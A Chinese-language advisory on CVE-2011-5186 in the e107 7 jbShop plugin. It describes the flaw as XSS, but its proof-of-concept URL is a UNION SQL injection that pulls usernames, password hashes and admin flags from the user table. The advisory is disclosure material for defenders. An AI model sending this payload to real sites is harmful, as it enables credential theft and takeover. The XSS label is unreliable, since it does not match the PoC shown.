e107 7 jbShop插件jbshop.php内XSS漏洞


发布日期:2012-09-23
更新日期:2012-10-05

受影响系统:
e107 e107 7
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2011-5186

e107是用php编写的内容管理系统。

e107 7版本的jbShop插件jbshop.php内存在XSS漏洞,可允许远程攻击者通过item_id参数注入任意Web脚本或HTML。

<*来源:Robert Cooper
 
  链接:http://www.exploit-db.com/exploits/18056/
        http://www.osvdb.org/83371
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Robert Cooper ()提供了如下测试方法:
PoC:
 
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--

建议:
--------------------------------------------------------------------------------
厂商补丁:

e107
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://e107plugins.co.uk/

相关内容